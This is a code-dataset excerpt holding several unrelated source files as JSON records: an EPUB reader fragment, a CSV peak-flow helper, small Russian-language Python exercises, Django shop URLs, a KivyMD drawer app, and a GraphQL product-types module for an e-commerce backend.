'\r\n s = NEXT_TEMPLATE % _page_name(i+1)\r\n content = content.replace(m, s+m)\r\n url = \"Text/%s\" % _page_name(i)\r\n page = epub.EpubItem(file_name=url, content=content)\r\n yield page\r\n\r\n for p in self._workpath:\r\n for filename in glob(os.path.join(p, 'chapter*.xhtml')):\r\n name = os.path.basename(filename)\r\n with open(filename, 'rb') as f:\r\n page = epub.EpubItem(file_name=\"Text/%s\" % name,\r\n content=f.read())\r\n yield page\r\n\r\n n = 0\r\n for p in self._workpath:\r\n prefix = 'Styles/' + str(n)\r\n n += 1\r\n for filename in glob(os.path.join(p, '*.woff')):\r\n name = os.path.basename(filename)\r\n with open(filename, 'rb') as f:\r\n page = epub.EpubItem(\r\n file_name=\"%s/%s\" % (prefix, name),\r\n content=f.read())\r\n yield page\r\n\r\n\r\ndef register_reader():\r\n return PdfReader()\r\n\r\n\r\nif __name__ == '__main__':\r\n r = PdfReader()\r\n","sub_path":"readers/reader_pdf2.py","file_name":"reader_pdf2.py","file_ext":"py","file_size_in_byte":7033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"510590414","text":"# standard library\nimport os\n# project\nimport config\n\n\ndef line_generator():\n first_line = True;\n with open(config.NEW_PEAK_FLOW_SOURCE) as handle:\n for line in handle:\n if first_line:\n first_line = False\n continue\n yield(line)\n\n\ndef get_comid(line):\n return line.split(',')[0]\n\n\ndef process(line):\n comid = get_comid(line)\n path = os.path.join(config.OBSERVED_FILTERED, comid + '.csv')\n print(comid)\n with open(path) as handle:\n lines = [ln for ln in handle]\n if line not in lines:\n lines.append(line)\n lines.sort()\n with open(path, 'w') as handle:\n for line in lines:\n handle.write(line)\n\n\ndef main():\n # os.makedirs(config.OBSERVED_NEW_PEAK, exist_ok=True)\n for line in line_generator():\n process(line)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"helper_scripts/peak_flow.py","file_name":"peak_flow.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"163602464","text":"\"\"\"\n8.\tПосчитать, сколько раз встречается определенная цифра в введенной\n последовательности чисел. Количество вводимых чисел и цифра,\n которую необходимо посчитать, задаются вводом с клавиатуры.\n\"\"\"\n\ndef finder(numbers, number, number_counter = 0):\n if numbers == 0:\n return f\"{number_counter}\"\n else:\n if numbers % 10 == number:\n number_counter += 1\n numbers = numbers // 10\n return finder(numbers, number, number_counter)\n\n\nNUMBERS = int(input(\"Введите составное число: \"))\nNUMBER = int(input(\"Какую цифру ищем: \"))\n\nprint(f'Мы ищем количество вхождений {NUMBER} в {NUMBERS}, давайте узнаем: ровно {finder(NUMBERS, NUMBER)} раза')","sub_path":"Lesson_2/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"45575088","text":"#Запросите у пользователя значения выручки и издержек фирмы.\r\n#6. Определите, с каким финансовым результатом работает фирма\r\n#(при��ыль — выручка больше издержек, или убыток — издержки больше выручки).\r\n#Выведите соответствующее сообщение.\r\n#Если фирма отработала с прибылью, вычислите рентабельность выручки (соотношение прибыли к выручке).\r\n#Далее запросите численность сотрудников фирмы и определите прибыль фирмы в расчете на одного сотрудника.\r\n\r\nrevenue = int(input('Выручка: '))\r\ncost = int(input('Затраты: '))\r\nprofit = revenue - cost\r\nif profit > 0:\r\n print(f'Good news, your have profit {profit}')\r\n marg = profit / revenue*100\r\n workers_n = int(input('Численность Вашей фирмы?'))\r\n average_p = profit/workers_n\r\n print(f'Рентабельность деятельности {marg:2}%, прибыль на сотрудника: {average_p:2}')\r\nelse:\r\n print(f'Bad news, your have loss {profit}')\r\n","sub_path":"HW 5.py","file_name":"HW 5.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"629072190","text":"from django.urls import path\n\nfrom .views import index, ProductbyCategoryListView, ComputerFilterView, NoutFilterView, KonsoliFilterView, IgriFilterView, product_detail\n\napp_name = 'shop'\n\nurlpatterns = [\n path('filter_comp/', ComputerFilterView.as_view(), name = 'computers_filter'),\n path('filter_nout/', NoutFilterView.as_view(), name = 'nout_filter'),\n path('filter_konsoli/', KonsoliFilterView.as_view(), name = 'konsoli_filter'),\n path('filter_igri/', IgriFilterView.as_view(), name = 'igri_filter'),\n path('/', ProductbyCategoryListView.as_view(), name = 'product_list_by_category'),\n path('//', product_detail, name = 'product_detail'),\n path('', index, name = 'index'),\n]\n","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"643250991","text":"from kivy.config import Config\nfrom kivy.core.window import Window\nfrom kivy.graphics import Color\nfrom kivy.lang import Builder\nfrom kivy.properties import ObjectProperty, StringProperty, ListProperty, NumericProperty\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.image import Image\nfrom kivy.uix.recycleview import RecycleView\nfrom kivy.uix.screenmanager import Screen\nfrom kivy.clock import Clock\nfrom kivymd.uix.button import MDIconButton\nfrom kivymd.app import MDApp\nfrom kivymd.theming import ThemableBehavior\nfrom kivymd.uix.boxlayout import MDBoxLayout\nfrom kivymd.uix.expansionpanel import MDExpansionPanel, MDExpansionPanelOneLine\nfrom kivymd.uix.label import MDLabel\nfrom kivymd.uix.list import ILeftBodyTouch, IRightBodyTouch, OneLineAvatarIconListItem, MDList, IconLeftWidget\n\nfrom data import head, body, end\n\n# Dimensiones de pantalla portrait\nConfig.set('graphics','resizable',0)\nWindow.size = (360, 640)\n\nclass Container(IRightBodyTouch, MDBoxLayout):\n adaptive_width = True\n\nclass ContentNavigationDrawer(BoxLayout):\n pass\n\nclass NavigationItem(OneLineAvatarIconListItem):\n icon = StringProperty() \n icon2 = StringProperty()\n\nclass Content(MDBoxLayout):\n def __init__(self, item):\n super(Content, self).__init__() \n self.ids.rv.data = []\n\n # si no son cadenas vacias '', agrego a la data al recycleview\n if item['sub'] != '':\n for sub_obj in item['sub']: \n self.ids.rv.data.append(\n {\n \"viewclass\": \"NavigationItem\",\n \"icon\": sub_obj['icon'],\n \"text\": sub_obj['text'],\n \"icon2\": sub_obj['icon_button'],\n \"callback\": lambda x: x,\n }\n )\n\nclass DrawerList(ThemableBehavior, MDList):\n def set_color_item(self, instance_item):\n \"\"\"Called when tap on a menu item.\"\"\"\n\n # Set the color of the icon and text for the menu item.\n for item in self.children:\n if item.text_color == self.theme_cls.primary_color:\n item.text_color = self.theme_cls.text_color\n break\n instance_item.text_color = self.theme_cls.primary_color\n\n\"\"\" Clase para cuando no hay ninguna imagen, está clase en vez de heredar del widget IRightBodyTouch hereda de ILeftBody Touch.\n\n\"\"\"\n\nclass MDExpansionChevronRight(ILeftBodyTouch, MDIconButton):\n\n _angle = NumericProperty(0)\n\nclass MyExpansionPanel(MDExpansionPanel):\n \n def __init__(self, data, image, **kwargs):\n super(MyExpansionPanel, self).__init__(**kwargs)\n self.at_least_an_image=image\n\n \"\"\" si no hay ninguna imagen, borra el widget ImageLeftWidget de la componente MDExpansionPanel y agrega el widget MDExpansionChevronRight() a la izquierda.\n \n \"\"\"\n\n if not self.at_least_an_image:\n for child in self.panel_cls.children[0:1]:\n self.panel_cls.remove_widget(child)\n \n self.chevron = MDExpansionChevronRight()\n self.panel_cls.add_widget(self.chevron)\n \nclass NavigationDrawer(MDApp):\n \n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n \n def build(self):\n return Builder.load_file(\"myfile.kv\")\n\n def on_start(self):\n new_doby = list()\n\n \"\"\" Cambia todos las claves None por '' porque\n None is not allowed for MDExpansionPanel.icon \n\n \"\"\"\n at_least_an_image = False\n\n for obj in body:\n for key,val in obj.items():\n if val == None:\n obj[key] = ''\n if obj['icon'] != '': \n at_least_an_image = True\n\n new_doby.append(obj) \n\n for new_obj in new_doby:\n self.root.ids.content_drawer.ids.md_list.add_widget(\n MyExpansionPanel(\n image=at_least_an_image,\n data=new_obj,\n icon=new_obj[\"icon\"],\n content=Content(new_obj),\n panel_cls=MDExpansionPanelOneLine(\n text=\"[color=6258B1]\" + new_obj[\"text\"] + \"[/color]\",\n )\n )\n ) \n\nNavigationDrawer().run()","sub_path":"learning/tests/challenge_1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"398476300","text":"import sys\nfrom collections import defaultdict\nfrom dataclasses import asdict\nfrom typing import List, Optional\n\nimport graphene\nfrom django_countries.fields import Country\nfrom graphene import relay\n\nfrom ....attribute import models as attribute_models\nfrom ....core.permissions import (\n AuthorizationFilters,\n OrderPermissions,\n ProductPermissions,\n has_one_of_permissions,\n)\nfrom ....core.tracing import traced_resolver\nfrom ....core.utils import build_absolute_uri, get_currency_for_country\nfrom ....core.weight import convert_weight_to_default_weight_unit\nfrom ....product import models\nfrom ....product.models import ALL_PRODUCTS_PERMISSIONS\nfrom ....product.utils import calculate_revenue_for_variant\nfrom ....product.utils.availability import (\n get_product_availability,\n get_variant_availability,\n)\nfrom ....product.utils.variants import get_variant_selection_attributes\nfrom ....thumbnail.utils import get_image_or_proxy_url, get_thumbnail_size\nfrom ....warehouse.reservations import is_reservation_enabled\nfrom ...account import types as account_types\nfrom ...account.enums import CountryCodeEnum\nfrom ...attribute.filters import AttributeFilterInput\nfrom ...attribute.resolvers import resolve_attributes\nfrom ...attribute.types import (\n AssignedVariantAttribute,\n Attribute,\n AttributeCountableConnection,\n SelectedAttribute,\n)\nfrom ...channel import ChannelContext, ChannelQsContext\nfrom ...channel.dataloaders import ChannelBySlugLoader\nfrom ...channel.types import ChannelContextType, ChannelContextTypeWithMetadata\nfrom ...channel.utils import get_default_channel_slug_or_graphql_error\nfrom ...core.connection import (\n CountableConnection,\n create_connection_slice,\n filter_connection_queryset,\n)\nfrom ...core.descriptions import (\n ADDED_IN_31,\n DEPRECATED_IN_3X_FIELD,\n DEPRECATED_IN_3X_INPUT,\n PREVIEW_FEATURE,\n RICH_CONTENT,\n)\nfrom ...core.enums import ReportingPeriod\nfrom ...core.federation import federated_entity, resolve_federation_references\nfrom ...core.fields import (\n ConnectionField,\n FilterConnectionField,\n JSONString,\n PermissionsField,\n)\nfrom ...core.types import (\n Image,\n ModelObjectType,\n NonNullList,\n TaxedMoney,\n TaxedMoneyRange,\n TaxType,\n ThumbnailField,\n Weight,\n)\nfrom ...core.utils import from_global_id_or_error\nfrom ...discount.dataloaders import DiscountsByDateTimeLoader\nfrom ...meta.types import ObjectWithMetadata\nfrom ...order.dataloaders import (\n OrderByIdLoader,\n OrderLinesByVariantIdAndChannelIdLoader,\n)\nfrom ...plugins.dataloaders import load_plugin_manager\nfrom ...product.dataloaders.products import (\n AvailableProductVariantsByProductIdAndChannel,\n ProductVariantsByProductIdAndChannel,\n)\nfrom ...site.dataloaders import load_site\nfrom ...translations.fields import TranslationField\nfrom ...translations.types import (\n CategoryTranslation,\n CollectionTranslation,\n ProductTranslation,\n ProductVariantTranslation,\n)\nfrom ...utils import get_user_or_app_from_context\nfrom ...utils.filters import reporting_period_to_date\nfrom ...warehouse.dataloaders import (\n AvailableQuantityByProductVariantIdCountryCodeAndChannelSlugLoader,\n PreorderQuantityReservedByVariantChannelListingIdLoader,\n StocksWithAvailableQuantityByProductVariantIdCountryCodeAndChannelLoader,\n)\nfrom ...warehouse.types import Stock\nfrom ..dataloaders import (\n CategoryByIdLoader,\n CategoryChildrenByCategoryIdLoader,\n CollectionChannelListingByCollectionIdAndChannelSlugLoader,\n CollectionChannelListingByCollectionIdLoader,\n CollectionsByProductIdLoader,\n ImagesByProductIdLoader,\n ImagesByProductVariantIdLoader,\n MediaByProductIdLoader,\n MediaByProductVariantIdLoader,\n ProductAttributesByProductTypeIdLoader,\n ProductByIdLoader,\n ProductChannelListingByProductIdAndChannelSlugLoader,\n ProductChannelListingByProductIdLoader,\n ProductTypeByIdLoader,\n ProductVariantByIdLoader,\n ProductVariantsByProductIdLoader,\n SelectedAttributesByProductIdLoader,\n SelectedAttributesByProductVariantIdLoader,\n ThumbnailByCategoryIdSizeAndFormatLoader,\n ThumbnailByCollectionIdSizeAndFormatLoader,\n ThumbnailByProductMediaIdSizeAndFormatLoader,\n VariantAttributesByProductTypeIdLoader,\n VariantChannelListingByVariantIdAndChannelSlugLoader,\n VariantChannelListingByVariantIdLoader,\n VariantsChannelListingByProductIdAndChannelSlugLoader,\n)\nfrom ..enums import ProductMediaType, ProductTypeKindEnum, VariantAttributeScope\nfrom ..filters import ProductFilterInput\nfrom ..resolvers import resolve_product_variants, resolve_products\nfrom ..sorters import ProductOrder\nfrom .channels import (\n CollectionChannelListing,\n ProductChannelListing,\n ProductVariantChannelListing,\n)\nfrom .digital_contents import DigitalContent\n\ndestination_address_argument = graphene.Argument(\n account_types.AddressInput,\n description=(\n \"Destination address used to find warehouses where stock availability \"\n \"for this product is checked. If address is empty, uses \"\n \"`Shop.companyAddress` or fallbacks to server's \"\n \"`settings.DEFAULT_COUNTRY` configuration.\"\n ),\n)\n\n\nclass Margin(graphene.ObjectType):\n start = graphene.Int()\n stop = graphene.Int()\n\n\nclass BasePricingInfo(graphene.ObjectType):\n on_sale = graphene.Boolean(description=\"Whether it is in sale or not.\")\n discount = graphene.Field(\n TaxedMoney, description=\"The discount amount if in sale (null otherwise).\"\n )\n discount_local_currency = graphene.Field(\n TaxedMoney, description=\"The discount amount in the local currency.\"\n )\n\n\nclass VariantPricingInfo(BasePricingInfo):\n discount_local_currency = graphene.Field(\n TaxedMoney, description=\"The discount amount in the local currency.\"\n )\n price = graphene.Field(\n TaxedMoney, description=\"The price, with any discount subtracted.\"\n )\n price_undiscounted = graphene.Field(\n TaxedMoney, description=\"The price without any discount.\"\n )\n price_local_currency = graphene.Field(\n TaxedMoney, description=\"The discounted price in the local currency.\"\n )\n\n class Meta:\n description = \"Represents availability of a variant in the storefront.\"\n\n\nclass ProductPricingInfo(BasePricingInfo):\n price_range = graphene.Field(\n TaxedMoneyRange,\n description=\"The discounted price range of the product variants.\",\n )\n price_range_undiscounted = graphene.Field(\n TaxedMoneyRange,\n description=\"The undiscounted price range of the product variants.\",\n )\n price_range_local_currency = graphene.Field(\n TaxedMoneyRange,\n description=(\n \"The discounted price range of the product variants \"\n \"in the local currency.\"\n ),\n )\n\n class Meta:\n description = \"Represents availability of a product in the storefront.\"\n\n\nclass PreorderData(graphene.ObjectType):\n global_threshold = PermissionsField(\n graphene.Int,\n required=False,\n description=\"The global preorder threshold for product variant.\",\n permissions=[ProductPermissions.MANAGE_PRODUCTS],\n )\n global_sold_units = PermissionsField(\n graphene.Int,\n required=True,\n description=\"Total number of sold product variant during preorder.\",\n permissions=[ProductPermissions.MANAGE_PRODUCTS],\n )\n end_date = graphene.DateTime(required=False, description=\"Preorder end date.\")\n\n class Meta:\n description = \"Represents preorder settings for product variant.\"\n\n @staticmethod\n def resolve_global_threshold(root, _info):\n return root.global_threshold\n\n @staticmethod\n def resolve_global_sold_units(root, _info):\n return root.global_sold_units\n\n\n@federated_entity(\"id channel\")\nclass ProductVariant(ChannelContextTypeWithMetadata, ModelObjectType):\n id = graphene.GlobalID(required=True)\n name = graphene.String(required=True)\n sku = graphene.String()\n product = graphene.Field(lambda: Product, required=True)\n track_inventory = graphene.Boolean(required=True)\n quantity_limit_per_customer = graphene.Int()\n weight = graphene.Field(Weight)\n channel = graphene.String(\n description=(\n \"Channel given to retrieve this product variant. Also used by federation \"\n \"gateway to resolve this object in a federated query.\"\n ),\n )\n channel_listings = PermissionsField(\n NonNullList(ProductVariantChannelListing),\n description=\"List of price information in channels for the product.\",\n permissions=[\n AuthorizationFilters.AUTHENTICATED_APP,\n AuthorizationFilters.AUTHENTICATED_STAFF_USER,\n ],\n )\n pricing = graphene.Field(\n VariantPricingInfo,\n address=destination_address_argument,\n description=(\n \"Lists the storefront variant's pricing, the current price and discounts, \"\n \"only meant for displaying.\"\n ),\n )\n attributes = NonNullList(\n SelectedAttribute,\n required=True,\n description=\"List of attributes assigned to this variant.\",\n variant_selection=graphene.Argument(\n VariantAttributeScope,\n description=\"Define scope of returned attributes.\",\n ),\n )\n margin = graphene.Int(description=\"Gross margin percentage value.\")\n quantity_ordered = PermissionsField(\n graphene.Int,\n description=\"Total quantity ordered.\",\n permissions=[ProductPermissions.MANAGE_PRODUCTS],\n )\n revenue = PermissionsField(\n TaxedMoney,\n period=graphene.Argument(ReportingPeriod),\n description=(\n \"Total revenue generated by a variant in given period of time. Note: this \"\n \"field should be queried using `reportProductSales` query as it uses \"\n \"optimizations suitable for such calculations.\"\n ),\n permissions=[ProductPermissions.MANAGE_PRODUCTS],\n )\n images = NonNullList(\n lambda: ProductImage,\n description=\"List of images for the product variant.\",\n deprecation_reason=f\"{DEPRECATED_IN_3X_FIELD} Use the `media` field instead.\",\n )\n media = NonNullList(\n lambda: ProductMedia,\n description=\"List of media for the product variant.\",\n )\n translation = TranslationField(\n ProductVariantTranslation,\n type_name=\"product variant\",\n resolver=ChannelContextType.resolve_translation,\n )\n digital_content = PermissionsField(\n DigitalContent,\n description=\"Digital content for the product variant.\",\n permissions=[ProductPermissions.MANAGE_PRODUCTS],\n )\n stocks = PermissionsField(\n NonNullList(Stock),\n description=\"Stocks for the product variant.\",\n address=destination_address_argument,\n country_code=graphene.Argument(\n CountryCodeEnum,\n description=(\n \"Two-letter ISO 3166-1 country code. \"\n f\"{DEPRECATED_IN_3X_INPUT} Use `address` argument instead.\"\n ),\n ),\n permissions=[\n ProductPermissions.MANAGE_PRODUCTS,\n OrderPermissions.MANAGE_ORDERS,\n ],\n )\n quantity_available = graphene.Int(\n required=False,\n description=(\n \"Quantity of a product available for sale in one checkout. \"\n \"Field value will be `null` when \"\n \"no `limitQuantityPerCheckout` in global settings has been set, and \"\n \"`productVariant` stocks are not tracked.\"\n ),\n address=destination_address_argument,\n country_code=graphene.Argument(\n CountryCodeEnum,\n description=(\n \"Two-letter ISO 3166-1 country code. When provided, the exact quantity \"\n \"from a warehouse operating in shipping zones that contain this \"\n \"country will be returned. Otherwise, it will return the maximum \"\n \"quantity from all shipping zones. \"\n f\"{DEPRECATED_IN_3X_INPUT} Use `address` argument instead.\"\n ),\n ),\n )\n preorder = graphene.Field(\n PreorderData,\n required=False,\n description=(\n \"Preorder data for product variant.\" + ADDED_IN_31 + PREVIEW_FEATURE\n ),\n )\n created = graphene.DateTime(required=True)\n updated_at = graphene.DateTime(required=True)\n\n class Meta:\n default_resolver = ChannelContextType.resolver_with_context\n description = (\n \"Represents a version of a product such as different size or color.\"\n )\n interfaces = [relay.Node, ObjectWithMetadata]\n model = models.ProductVariant\n\n @staticmethod\n def resolve_created(root: ChannelContext[models.ProductVariant], _info):\n return root.node.created_at\n\n @staticmethod\n def resolve_channel(root: ChannelContext[models.Product], _info):\n return root.channel_slug\n\n @staticmethod\n def resolve_stocks(\n root: ChannelContext[models.ProductVariant],\n info,\n address=None,\n country_code=None,\n ):\n if address is not None:\n country_code = address.country\n return StocksWithAvailableQuantityByProductVariantIdCountryCodeAndChannelLoader(\n info.context\n ).load((root.node.id, country_code, root.channel_slug))\n\n @staticmethod\n def resolve_quantity_available(\n root: ChannelContext[models.ProductVariant],\n info,\n address=None,\n country_code=None,\n ):\n if address is not None:\n country_code = address.country\n site = load_site(info.context)\n channel_slug = str(root.channel_slug) if root.channel_slug else None\n\n global_quantity_limit_per_checkout = site.settings.limit_quantity_per_checkout\n\n if root.node.is_preorder_active():\n variant = root.node\n channel_listing = VariantChannelListingByVariantIdAndChannelSlugLoader(\n info.context\n ).load((variant.id, channel_slug))\n\n def calculate_available_per_channel(channel_listing):\n if (\n channel_listing\n and channel_listing.preorder_quantity_threshold is not None\n ):\n if is_reservation_enabled(site.settings):\n quantity_reserved = (\n PreorderQuantityReservedByVariantChannelListingIdLoader(\n info.context\n ).load(channel_listing.id)\n )\n\n def calculate_available_channel_quantity_with_reservations(\n reserved_quantity,\n ):\n return max(\n min(\n channel_listing.preorder_quantity_threshold\n - channel_listing.preorder_quantity_allocated\n - reserved_quantity,\n global_quantity_limit_per_checkout or sys.maxsize,\n ),\n 0,\n )\n\n return quantity_reserved.then(\n calculate_available_channel_quantity_with_reservations\n )\n\n return min(\n channel_listing.preorder_quantity_threshold\n - channel_listing.preorder_quantity_allocated,\n global_quantity_limit_per_checkout or sys.maxsize,\n )\n if variant.preorder_global_threshold is not None:\n variant_channel_listings = VariantChannelListingByVariantIdLoader(\n info.context\n ).load(variant.id)\n\n def calculate_available_global(variant_channel_listings):\n if not variant_channel_listings:\n return global_quantity_limit_per_checkout\n global_sold_units = sum(\n channel_listing.preorder_quantity_allocated\n for channel_listing in variant_channel_listings\n )\n\n available_quantity = variant.preorder_global_threshold\n available_quantity -= global_sold_units\n\n if is_reservation_enabled(site.settings):\n quantity_reserved = (\n PreorderQuantityReservedByVariantChannelListingIdLoader(\n info.context\n ).load_many(\n [listing.id for listing in variant_channel_listings]\n )\n )\n\n def calculate_available_global_quantity_with_reservations(\n reserved_quantities,\n ):\n return max(\n min(\n variant.preorder_global_threshold\n - global_sold_units\n - sum(reserved_quantities),\n global_quantity_limit_per_checkout\n or sys.maxsize,\n ),\n 0,\n )\n\n return quantity_reserved.then(\n calculate_available_global_quantity_with_reservations\n )\n\n return min(\n variant.preorder_global_threshold - global_sold_units,\n global_quantity_limit_per_checkout or sys.maxsize,\n )\n\n return variant_channel_listings.then(calculate_available_global)\n\n return global_quantity_limit_per_checkout\n\n return channel_listing.then(calculate_available_per_channel)\n\n if not root.node.track_inventory:\n return global_quantity_limit_per_checkout\n\n return AvailableQuantityByProductVariantIdCountryCodeAndChannelSlugLoader(\n info.context\n ).load((root.node.id, country_code, channel_slug))\n\n @staticmethod\n def resolve_digital_content(root: ChannelContext[models.ProductVariant], _info):\n return getattr(root.node, \"digital_content\", None)\n\n @staticmethod\n def resolve_attributes(\n root: ChannelContext[models.ProductVariant],\n info,\n variant_selection: Optional[str] = None,\n ):\n def apply_variant_selection_filter(selected_attributes):\n if not variant_selection or variant_selection == VariantAttributeScope.ALL:\n return selected_attributes\n attributes = [\n (selected_att[\"attribute\"], selected_att[\"variant_selection\"])\n for selected_att in selected_attributes\n ]\n variant_selection_attrs = [\n attr for attr, _ in get_variant_selection_attributes(attributes)\n ]\n\n if variant_selection == VariantAttributeScope.VARIANT_SELECTION:\n return [\n selected_attribute\n for selected_attribute in selected_attributes\n if selected_attribute[\"attribute\"] in variant_selection_attrs\n ]\n return [\n selected_attribute\n for selected_attribute in selected_attributes\n if selected_attribute[\"attribute\"] not in variant_selection_attrs\n ]\n\n return (\n SelectedAttributesByProductVariantIdLoader(info.context)\n .load(root.node.id)\n .then(apply_variant_selection_filter)\n )\n\n @staticmethod\n def resolve_channel_listings(root: ChannelContext[models.ProductVariant], info):\n return VariantChannelListingByVariantIdLoader(info.context).load(root.node.id)\n\n @staticmethod\n def resolve_pricing(\n root: ChannelContext[models.ProductVariant], info, *, address=None\n ):\n if not root.channel_slug:\n return None\n\n channel_slug = str(root.channel_slug)\n context = info.context\n\n product = ProductByIdLoader(context).load(root.node.product_id)\n product_channel_listing = ProductChannelListingByProductIdAndChannelSlugLoader(\n context\n ).load((root.node.product_id, channel_slug))\n variant_channel_listing = VariantChannelListingByVariantIdAndChannelSlugLoader(\n context\n ).load((root.node.id, channel_slug))\n collections = CollectionsByProductIdLoader(context).load(root.node.product_id)\n channel = ChannelBySlugLoader(context).load(channel_slug)\n\n address_country = address.country if address is not None else None\n manager = load_plugin_manager(info.context)\n\n def calculate_pricing_info(discounts):\n def calculate_pricing_with_channel(channel):\n def calculate_pricing_with_product_variant_channel_listings(\n variant_channel_listing,\n ):\n def calculate_pricing_with_product(product):\n def calculate_pricing_with_product_channel_listings(\n product_channel_listing,\n ):\n def calculate_pricing_with_collections(collections):\n if (\n not variant_channel_listing\n or not product_channel_listing\n ):\n return None\n\n country_code = (\n address_country or channel.default_country.code\n )\n\n local_currency = None\n local_currency = get_currency_for_country(country_code)\n\n availability = get_variant_availability(\n variant=root.node,\n variant_channel_listing=variant_channel_listing,\n product=product,\n product_channel_listing=product_channel_listing,\n collections=collections,\n discounts=discounts,\n channel=channel,\n country=Country(country_code),\n local_currency=local_currency,\n plugins=manager,\n )\n return VariantPricingInfo(**asdict(availability))\n\n return collections.then(calculate_pricing_with_collections)\n\n return product_channel_listing.then(\n calculate_pricing_with_product_channel_listings\n )\n\n return product.then(calculate_pricing_with_product)\n\n return variant_channel_listing.then(\n calculate_pricing_with_product_variant_channel_listings\n )\n\n return channel.then(calculate_pricing_with_channel)\n\n return (\n DiscountsByDateTimeLoader(context)\n .load(info.context.request_time)\n .then(calculate_pricing_info)\n )\n\n @staticmethod\n def resolve_product(root: ChannelContext[models.ProductVariant], info):\n product = ProductByIdLoader(info.context).load(root.node.product_id)\n return product.then(\n lambda product: ChannelContext(node=product, channel_slug=root.channel_slug)\n )\n\n @staticmethod\n def resolve_quantity_ordered(root: ChannelContext[models.ProductVariant], _info):\n # This field is added through annotation when using the\n # `resolve_report_product_sales` resolver.\n return getattr(root.node, \"quantity_ordered\", None)\n\n @staticmethod\n @traced_resolver\n def resolve_revenue(root: ChannelContext[models.ProductVariant], info, *, period):\n start_date = reporting_period_to_date(period)\n variant = root.node\n channel_slug = root.channel_slug\n\n def calculate_revenue_with_channel(channel):\n if not channel:\n return None\n\n def calculate_revenue_with_order_lines(order_lines):\n def calculate_revenue_with_orders(orders):\n orders_dict = {order.id: order for order in orders}\n return calculate_revenue_for_variant(\n variant,\n start_date,\n order_lines,\n orders_dict,\n channel.currency_code,\n )\n\n order_ids = [order_line.order_id for order_line in order_lines]\n return (\n OrderByIdLoader(info.context)\n .load_many(order_ids)\n .then(calculate_revenue_with_orders)\n )\n\n return (\n OrderLinesByVariantIdAndChannelIdLoader(info.context)\n .load((variant.id, channel.id))\n .then(calculate_revenue_with_order_lines)\n )\n\n return (\n ChannelBySlugLoader(info.context)\n .load(channel_slug)\n .then(calculate_revenue_with_channel)\n )\n\n @staticmethod\n def resolve_media(root: ChannelContext[models.ProductVariant], info):\n return MediaByProductVariantIdLoader(info.context).load(root.node.id)\n\n @staticmethod\n def resolve_images(root: ChannelContext[models.ProductVariant], info):\n return ImagesByProductVariantIdLoader(info.context).load(root.node.id)\n\n @staticmethod\n def resolve_weight(root: ChannelContext[models.ProductVariant], _info):\n return convert_weight_to_default_weight_unit(root.node.weight)\n\n @staticmethod\n @traced_resolver\n def resolve_preorder(root: ChannelContext[models.ProductVariant], info):\n variant = root.node\n\n variant_channel_listings = VariantChannelListingByVariantIdLoader(\n info.context\n ).load(variant.id)\n\n def calculate_global_sold_units(variant_channel_listings):\n global_sold_units = sum(\n channel_listing.preorder_quantity_allocated\n for channel_listing in variant_channel_listings\n )\n return (\n PreorderData(\n global_threshold=variant.preorder_global_threshold,\n global_sold_units=global_sold_units,\n end_date=variant.preorder_end_date,\n )\n if variant.is_preorder_active()\n else None\n )\n\n return variant_channel_listings.then(calculate_global_sold_units)\n\n @staticmethod\n def __resolve_references(roots: List[\"ProductVariant\"], info):\n requestor = get_user_or_app_from_context(info.context)\n requestor_has_access_to_all = has_one_of_permissions(\n requestor, ALL_PRODUCTS_PERMISSIONS\n )\n\n channels = defaultdict(set)\n roots_ids = []\n for root in roots:\n roots_ids.append(f\"{root.channel}_{root.id}\")\n channels[root.channel].add(root.id)\n\n variants = {}\n for channel, ids in channels.items():\n qs = resolve_product_variants(\n info,\n requestor_has_access_to_all,\n requestor,\n ids=ids,\n channel_slug=channel,\n ).qs\n for variant in qs:\n global_id = graphene.Node.to_global_id(\"ProductVariant\", variant.id)\n variants[f\"{channel}_{global_id}\"] = ChannelContext(\n channel_slug=channel, node=variant\n )\n\n return [variants.get(root_id) for root_id in roots_ids]\n\n\nclass ProductVariantCountableConnection(CountableConnection):\n class Meta:\n node = ProductVariant\n\n\n@federated_entity(\"id channel\")\nclass Product(ChannelContextTypeWithMetadata, ModelObjectType):\n id = graphene.GlobalID(required=True)\n seo_title = graphene.String()\n seo_description = graphene.String()\n name = graphene.String(required=True)\n description = JSONString(description=\"Description of the product.\" + RICH_CONTENT)\n product_type = graphene.Field(lambda: ProductType, required=True)\n slug = graphene.String(required=True)\n category = graphene.Field(lambda: Category)\n created = graphene.DateTime(required=True)\n updated_at = graphene.DateTime(required=True)\n charge_taxes = graphene.Boolean(required=True)\n weight = graphene.Field(Weight)\n default_variant = graphene.Field(ProductVariant)\n rating = graphene.Float()\n channel = graphene.String(\n description=(\n \"Channel given to retrieve this product. Also used by federation \"\n \"gateway to resolve this object in a federated query.\"\n ),\n )\n description_json = JSONString(\n description=\"Description of the product.\" + RICH_CONTENT,\n deprecation_reason=(\n f\"{DEPRECATED_IN_3X_FIELD} Use the `description` field instead.\"\n ),\n )\n thumbnail = ThumbnailField()\n pricing = graphene.Field(\n ProductPricingInfo,\n address=destination_address_argument,\n description=(\n \"Lists the storefront product's pricing, the current price and discounts, \"\n \"only meant for displaying.\"\n ),\n )\n is_available = graphene.Boolean(\n address=destination_address_argument,\n description=\"Whether the product is in stock and visible or not.\",\n )\n tax_type = graphene.Field(\n TaxType, description=\"A type of tax. Assigned by enabled tax gateway\"\n )\n attributes = NonNullList(\n SelectedAttribute,\n required=True,\n description=\"List of attributes assigned to this product.\",\n )\n channel_listings = PermissionsField(\n NonNullList(ProductChannelListing),\n description=\"List of availability in channels for the product.\",\n 